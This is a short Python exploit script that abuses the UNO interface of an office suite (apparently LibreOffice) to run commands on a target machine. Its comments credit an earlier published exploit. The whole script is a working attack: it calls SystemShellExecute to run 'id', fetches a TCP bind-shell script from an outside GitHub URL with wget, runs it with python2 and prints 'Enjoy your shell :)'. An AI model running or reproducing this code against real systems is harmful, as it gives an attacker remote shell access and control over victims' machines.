#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# some months ago, this bug had been shown, but not the full exploit published as there
# had been discussions with the vendor
# in any case i had fun exploiting it
# today i put it online, as sud0woodo who found the bug had published his full exploit as well some time ago check it here: https://www.exploit-db.com/exploits/46544

import uno
import time

bindshell='https://raw.githubusercontent.com/infodox/python-pty-shells/master/tcp_pty_bind.py'
localContext = uno.getComponentContext()

resolver = localContext.ServiceManager.createInstanceWithContext("com.sun.star.system.SystemShellExecute", localContext )

resolver.execute('id','','')
time.sleep(1)
resolver.execute('wget',bindshell,'')
time.sleep(2)
resolver.execute('python2','tcp_pty_bind.py','')

time.sleep(5)
print ('Enjoy your shell :)')